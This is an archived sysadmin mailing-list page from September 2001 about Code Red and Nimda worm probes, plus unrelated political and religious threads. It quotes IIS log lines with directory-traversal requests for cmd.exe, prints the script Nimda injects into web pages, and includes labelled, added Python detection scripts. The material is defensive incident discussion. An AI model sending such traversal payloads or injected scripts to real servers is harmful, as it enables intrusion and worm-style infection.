Sent: Tuesday, September 18, 2001 5:53 AM
To: NT System Admin Issues
Subject: Re: Senate votes to permit warrantless Net-wiretaps, Carnivore use

Write my Congressman about what? About implementing laws designed to protect us at the cost of a minor infringement on my civil rights? What are they doing that your employer or network admins, who could use benign e-mails in a much more malicious manner, don't already do. While I don't like it that we have go to these lengths, I feel it's necessary for our National Security. Besides, I've nothing to hide and if I had something to hide I would not be likely to send it via e-mail. Maybe, just maybe, if we had this in place a while back, some 6,000+ people, some of which may have even been on this list, would still be with us. It's a dangerous world out there, which requires unpleasant measures. GOD BLESS AMERICA.
RE: WARNING: Hacker Alert
How do you do that?

-----Original Message-----
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:26 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

looks like an exploit of the Hacked by Chinese type from several months ago. None of my servers have shown attempts. One easy way to stop most of the IIS probing is to simply require host headers on all sites. If your server doesn't respond when the get/put commands use an IP number, then most vulnerabilities aren't vulnerable. Then any scans would need to be done via DNS rather than random IP numbers, significantly slowing attacks.

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Here is a site that has been hit http://216.39.178.32

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert

Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]

-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert

All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET,
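
The probes in the posted log excerpt can be separated from normal traffic mechanically. The Python sketch below is an added example, not part of the original thread: it parses the comma-separated log format shown in the post, flags the request shapes seen there (cmd.exe, root.exe, encoded `..` traversal) and reports per client whether any probe was answered with status 200. The column names are this example's own labels, and the sample lines, host name and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# This example's own labels for the 15 comma-separated columns in the post.
FIELDS = ("client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_in", "bytes_out",
          "status", "win32_status", "method", "target", "params")

# Request shapes visible in the posted excerpt. The traversal pattern is
# deliberately loose so it still fires when the bytes between the dots and
# the slash were mangled by the logger.
SIGNATURES = (
    ("cmd.exe request", re.compile(r"/cmd\.exe$", re.I)),
    ("root.exe request", re.compile(r"/root\.exe$", re.I)),
    ("directory traversal", re.compile(r"\.\.[\\/]")),
)

# Constructed sample in the same layout; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10, -, 9/18/01, 10:36:28, W3SVC4, WEB01, 203.0.113.5, 0, 97, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
192.0.2.10, -, 9/18/01, 10:36:28, W3SVC4, WEB01, 203.0.113.5, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
192.0.2.10, -, 9/18/01, 10:36:32, W3SVC4, WEB01, 203.0.113.5, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
192.0.2.10, -, 9/18/01, 10:36:33, W3SVC4, WEB01, 203.0.113.5, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
198.51.100.7, -, 9/18/01, 10:36:42, W3SVC4, WEB01, 203.0.113.5, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
198.51.100.23, -, 9/18/01, 10:37:02, W3SVC4, WEB01, 203.0.113.5, 15, 72, 1204, 200, 0, GET, /MSADC/root.exe, /c+dir,
truncated line, GET,
"""


def parse_line(line):
    """Split one log line into named fields; None if it is incomplete."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def normalise(path, rounds=3):
    """Percent-decode until stable so an encoded separator cannot hide '..'."""
    for _ in range(rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path


def classify(record):
    """Return the names of all signatures the request target matches."""
    path = normalise(record["target"])
    return [name for name, rx in SIGNATURES if rx.search(path)]


def summarise(log_text):
    """Group probe requests by client; note probes the server answered 200."""
    report = defaultdict(lambda: {"probes": 0, "kinds": set(), "succeeded": []})
    skipped = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_line(line)
        if record is None:
            skipped += 1          # truncated or malformed line
            continue
        kinds = classify(record)
        if not kinds:
            continue              # ordinary request
        entry = report[record["client_ip"]]
        entry["probes"] += 1
        entry["kinds"].update(kinds)
        if record["status"] == "200":
            entry["succeeded"].append(record["target"])
    return dict(report), skipped


if __name__ == "__main__":
    report, skipped = summarise(SAMPLE_LOG)
    for ip, entry in sorted(report.items()):
        outcome = "ANSWERED 200" if entry["succeeded"] else "all rejected"
        print(f"{ip}: {entry['probes']} probes {sorted(entry['kinds'])} {outcome}")
    print(f"unparseable lines: {skipped}")
```

A client whose probes all drew 404 or 500, as in the posted excerpt, is scanning noise; a probe answered with 200 is the case that needs the server itself examined.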
RE: FW: Worm probes
From Panda (note they won't have a sig file for a few hours yet):

Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: Fw: FW: Worm probes

Here's one from a thread on nanog

HTH,
Geoff

----- Original Message -----
From: Jim Olsen [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes

This is the information i've collected thus far on W32.nimda:

W32.nimda is NOT a code red variant, and the people who are referring to it as Code Blue were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 servers to infect a server, and also employs email and web site mobile code to infect Windows 9x/ME/NT/2k boxes.

During the initial infection of a server, the worm does the following:
- download a file named admin.dll via tftp from the system that is trying to infect the target
- add the guest account to the local administrators group and activates the account
- makes sure c$ is shared out
- copies itself to c, d, and e drives
- tries to mail itself to email addresses that it discovers on the server
- creates a file named readme.exe, which is used in the mobile code inserted on the web sites below
- add this string to the web pages found on the server:
  <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
- scans for and infects other vulnerable IIS servers
- goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
- goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only)

If a user views a web site that is hosted on an infected server, the following happens:
- upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention)
- the user's machine becomes infected with W32.nimda at this point and time
- the worm starts scanning for other vulnerable IIS servers
- the worm emails itself to everyone on the user's address book
- goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
- goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only)

It is unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above.

EVERYONE who uses internet explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (i have not tested whether or not turning off javascript fixes the problem):
o) don't browse web pages until microsoft releases a patch
o) turn OFF javascript

EVERYONE who uses outlook/outlook express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview
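
The file names and the injected script listed in the message above lend themselves to a sweep of shared directories and web roots. The Python sketch below is an added example, not code from the thread or from any vendor: it walks a tree and reports the dropped file names, a riched20.dll sitting next to .doc files (the placement described in the Symantec text quoted elsewhere on this page), and web pages carrying the `window.open("readme.eml"` script. The directory layout in the fixture is constructed.

```python
import os
import re
import tempfile

# File names the messages on this page list as dropped by the worm.
DROPPED_NAMES = {"sample.nws", "sample.eml", "desktop.eml", "desktop.nws",
                 "readme.eml", "readme.exe", "admin.dll"}
WEB_EXTENSIONS = {".htm", ".html", ".asp"}
# The script appended to web pages; quotes are optional because some
# renderings of the string drop them.
INJECTED = re.compile(rb'''window\.open\(\s*["']?readme\.eml''', re.I)


def sweep(root):
    """Return sorted (relative_path, reason) leads found under root.

    Hits are leads to verify, not verdicts: a name such as admin.dll is also
    used by legitimate software (FrontPage Server Extensions ship one).
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lowered = [f.lower() for f in files]
        has_doc = any(f.endswith(".doc") for f in lowered)
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            low = name.lower()
            ext = os.path.splitext(low)[1]
            if low in DROPPED_NAMES:
                findings.append((rel, "dropped file name"))
            elif low == "riched20.dll" and has_doc:
                findings.append((rel, "riched20.dll beside .doc files"))
            elif ext in WEB_EXTENSIONS:
                try:
                    with open(path, "rb") as handle:
                        body = handle.read()
                except OSError:
                    # Locked or unreadable pages are reported, not ignored.
                    findings.append((rel, "unreadable web page"))
                    continue
                if INJECTED.search(body):
                    findings.append((rel, "injected readme.eml script"))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed fixture: clean files mixed with worm-style leftovers."""
    layout = {
        "wwwroot/index.html": b"<html><body>ok</body></html>",
        "wwwroot/default.asp":
            b"<html>welcome</html>"
            b'<html><script language="JavaScript">window.open("readme.eml", '
            b'null, "resizable=no,top=6000,left=6000")</script></html>',
        "wwwroot/readme.eml": b"placeholder",
        "docs/report.doc": b"placeholder",
        "docs/riched20.dll": b"placeholder",
        "docs/desktop.nws": b"placeholder",
        "system32/riched20.dll": b"placeholder",   # no .doc here: not flagged
    }
    for rel, data in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as handle:
            handle.write(data)


def demo():
    """Build the fixture in a temporary directory and sweep it."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return sweep(base)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:32} {rel}")
```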
RE: FW: Worm probes
Title: RE: FW: Worm probes reg hack to not execute perhaps? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. 
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes
Here's one from a thread on nanog HTH, Geoff
- Original Message -
From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes
This is the information I've collected thus far on W32.nimda:
W32.nimda is NOT a code red variant, and the people who were referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 servers to infect a server, and also employs email and web site mobile code to infect Windows 9x/ME/NT/2k boxes.
During the initial infection of a server, the worm does the following:
- downloads a file named "admin.dll" via tftp from the system that is trying to infect the target
- adds the guest account to the local administrators group and activates the account
- makes sure c$ is shared out
- copies itself to c, d, and e drives
- tries to mail itself to email addresses that it discovers on the server
- creates a file named readme.exe, which is used in the mobile code inserted on the web sites below
- adds this string to the web pages found on the server: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
- scans for and infects other vulnerable IIS servers
- goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
- goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)
If a user views a web site that is hosted on an infected server, the following happens:
- upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention)
- the user's machine becomes infected with W32.nimda at this point in time
- the worm starts scanning for other vulnerable IIS servers
- the worm emails itself to everyone on the user's address book
- goes through all shared directories and puts
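The file names and the appended script listed in the write-up above are enough for a first sweep of web roots and shares. The following is an added example, not part of the original thread: a Python sweep that flags those artifacts. The allowed directories for riched20.dll and mmc.exe, the web file extensions, and the sample tree are assumptions constructed for illustration.

```python
"""Sweep a directory tree for the Nimda artifacts listed in the thread."""
import os
import re
import tempfile

# File names the thread says the worm drops (matched case-insensitively).
DROPPED_NAMES = {
    "admin.dll", "readme.exe", "readme.eml",
    "sample.nws", "sample.eml", "desktop.eml", "desktop.nws",
}
# Names that are legitimate in some directories and suspicious elsewhere.
# ASSUMPTION: these allowed parent directories are a starting point to tune.
LOCATION_SENSITIVE = {
    "riched20.dll": {"system", "system32"},  # genuine DLL lives in the system dir
    "mmc.exe": {"system32"},                 # thread: trojan copy sits in winnt itself
}
# ASSUMPTION: extensions treated as web content on the server.
WEB_EXTENSIONS = {".htm", ".html", ".asp"}
# The script the worm appends to pages, tolerant of case, spacing and quoting.
INJECTED_SCRIPT = re.compile(
    rb'''window\.open\(\s*["']readme\.eml["']''', re.IGNORECASE)


def scan_tree(root):
    """Return a sorted list of (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        parent = os.path.basename(dirpath).lower()
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            lower = name.lower()
            if lower in DROPPED_NAMES:
                findings.append((rel, "dropped-file name"))
            elif (lower in LOCATION_SENSITIVE
                  and parent not in LOCATION_SENSITIVE[lower]):
                findings.append(
                    (rel, "system binary name in unexpected directory"))
            if os.path.splitext(lower)[1] in WEB_EXTENSIONS:
                try:
                    with open(full, "rb") as handle:
                        data = handle.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the sweep
                if INJECTED_SCRIPT.search(data):
                    findings.append((rel, "appended readme.eml script"))
    return sorted(findings)


# Constructed sample tree: placeholder bytes only, no real worm content.
SAMPLE_TREE = {
    "wwwroot/index.html": b"<html><body>clean page</body></html>",
    "wwwroot/default.htm": (
        b"<html><body>home</body></html>\n"
        b'<html><script language="JavaScript">window.open("readme.eml", '
        b'null, "resizable=no,top=6000,left=6000")</script></html>'),
    "wwwroot/readme.eml": b"constructed placeholder",
    "share/docs/riched20.dll": b"constructed placeholder",
    "share/docs/desktop.eml": b"constructed placeholder",
    "share/docs/report.txt": b"ordinary document",
    "winnt/system32/riched20.dll": b"expected location",
    "winnt/system32/mmc.exe": b"expected location",
    "winnt/mmc.exe": b"constructed placeholder",
}


def demo():
    """Build the sample tree in a temp directory and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as handle:
                handle.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, reason in demo():
        print(f"{reason}: {rel_path}")
```

A name match is only a lead for triage: confirm by comparing the flagged file against a known-good copy before deleting anything.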
RE: FW: Worm probes
Title: RE: FW: Worm probes
Name: Nimda
Alias: W32/Nimda
Virus Categories: WORM (E-MAIL)
Virus Families: W32 GROUP
Repairable: Yes
Date of Appearance: 09/18/2001
Included in the "Wild List": No
Activation Condition
Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm sends out a message that includes an attachment with the following name: README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format. After being decoded, the executable file that contains the worm is 57344 bytes long. One of the actions carried out by this worm consists of sharing the drive C: of the affected computer in order to spread to other network drives.
Means of Propagation: This worm uses e-mail to spread to other systems. To do this it sends out messages containing an attachment with the following name: README.EXE.
Symptoms of Infection: This worm creates several files in the Windows temporary directory. Although the content of these files is basically very similar to the original file, it does present certain variations. Additionally, it creates a file called Wininit.ini in the Windows directory. The worm is coded to download a file called Admin.dll. To do this it uses an application called Tftp.exe. Finally, the worm creates a new user through which it shares the C drive and attempts to spread to other network drives. Additionally, it exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer.
-Original Message-
From: Ray Zorz Sent: Tuesday, September 18, 2001 12:58 PM To: NT System Admin Issues Subject: RE: FW: Worm probes
reg hack to not execute perhaps?
-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:57 PM To: NT System Admin Issues Subject: RE: FW: Worm probes
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:26 PM To: NT System Admin Issues Subject: RE: FW: Worm probes
From Panda (note they won't have a sig file for a few hours yet):
Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.
I am not so sure that this assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not I wish to save the file to disk - the README.EXE file that is. I just click cancel and then delete the email. I do not contract the virus. John
Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus.
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes
Here's one from a thread on nanog HTH, Geoff
- Original Message -
From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes
This is the information I've collected thus far on W32.nimda:
W32.nimda is NOT a code red variant, and the people who were referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 servers to infect a server, and also employs email and web site mobile code to infect Windows 9x/ME/NT/2k
RE: Splash screens and wallpaper
Title: RE: Splash screens and wallpaper not sure about the splash screen. Wallpaper can be done with policies. -Original Message- From: Dan Munley [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 1:06 PM To: NT System Admin Issues Subject: Splash screens and wallpaper I have been asked to do two things. 1. Present a splash screen that everyone will see for 5 or 10 seconds during the logon or boot. 2. Change everyone's desktop wallpaper to some uniform graphic. I am looking for suggestions and would appreciate any help. I have previously created mandatory wallpaper using the registry editor and logon scripts. Thanks, Dan Munley http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: The idiocy continues!
Title: RE: The idiocy continues! He's not saying that everyone doesn't deserve the rights, only that the Constitution is for U.S. citizens. We have no jurisdiction outside of our borders, although part of the reason many other governments fear/hate/whatever the US is we think we should impose our Constitutional principles on their people too. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 10:54 AM To: NT System Admin Issues Subject: RE: The idiocy continues! I apologize for adding to this thread but I could not help myself. Saying that someone who lives outside of our country does not deserve the same basic rights they we enjoy is pretty much off the mark. If I remember correctly our Constitution says all men are created equal. Every man, woman, and child should be treated like a human being, no matter their country of origin. Now, I am not saying be nice or even be civil to scum that masterminded the attacks in NYC. Personally I would like to see the SOB's head on a pike in Central Park. All this is my humble opinion. --Dan -Original Message- From: Puckett, Matt [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 10:22 AM To: NT System Admin Issues Subject: RE: The idiocy continues! But lets remember that these rights are for americans only(no offense) and should not be used to protect the guilty hiding in other countries. They are not subject to our rights therefore no need for a trial. Matthew Puckett MCSE, MCP+Internet, MCP Customer Support Analyst Sprint PCS IT Service Delivery Bristol Customer Care Center 1-423-967-3086 - PCS -Original Message- From: Benjamin Scott [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 1:09 PM To: NT System Admin Issues Subject: RE: The idiocy continues! On Thu, 13 Sep 2001, Stuart Tonge wrote: What kind of civil liberties? 
For those outside the US, who may not be familiar with our government, here is a bit of a crash course: The foundation of our (i.e., the United States of America) government is our Constitution. The first ten Amendments to same are called The Bill of Rights, and specifically address certain freedoms our government is not allowed to restrict. An online copy is here: http://www.nara.gov/exhall/charters/billrights/billrights.html These form such a cornerstone of our political culture that all you have to do is mention the First Amendment and people will know you are talking about freedom of speech, press, and/or religion. I plead the Fifth is a common expression meaning I am not going to answer that, because it might get me in trouble. Whenever there is a major public criminal crisis, there are always those who advocate restricting these rights in the name of security or need. They do not seem to understand that the worst kind of crime is that inflicted by your own government against you. In this case, we can expect people to claim: - We should punish people without a trial, or even evidence - We should punish people who have committed no crimes - We should close our borders - Police should be able to search anyone at any time without a warrant - Police should be able to monitor private communications without a warrant Any of the above would violate the Bill of Rights. -- Ben Scott [EMAIL PROTECTED] | The opinions expressed in this message are those of the author and do not | | necessarily represent the views or policy of any other person, entity or | | organization. All information is provided without warranty of any kind. |
RE: Australian Expressing Sadness + Something to think about
Title: RE: Australian Expressing Sadness + Something to think about Last night while watching my son at Pop Warner football practice, this tragedy was of course the topic of conversation. It's amazing to me how many experts there are. One guy was talking about why Muslims hate Christians. Being pretty damn ignorant, I decided to do a little research this morning, and found this site - www.islam-guide.com. Maybe it's watered down a bit, and it doesn't explain religious fanaticism. But at least I understand their religion a little bit better. Just thought I throw this out. At least for me, education and understanding goes a long way. -Original Message- From: John Hornbuckle [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 8:33 AM To: NT System Admin Issues Subject: RE: Australian Expressing Sadness + Something to think about On top of Revelation, the book of Daniel also makes for an interesting read. I'm not going to use this forum (or my employer's time) to proselytize. I would just encourage those who do not believe that the Bible is the word of God to maybe reconsider when Israel becomes involved in an all-out war in the Middle East. If I'm wrong and the war never happens, you can thumb your nose at me and laugh. But if I'm right and the war DOES happen, grab yourself a Bible and start reading it with the state of mind that it may not just be a book full of fiction after all. Intellectuality and faith are not mutually exclusive. That's all I'm going to say on the matter, so please withhold the flames (unless you want to send them to me personally off the list). 
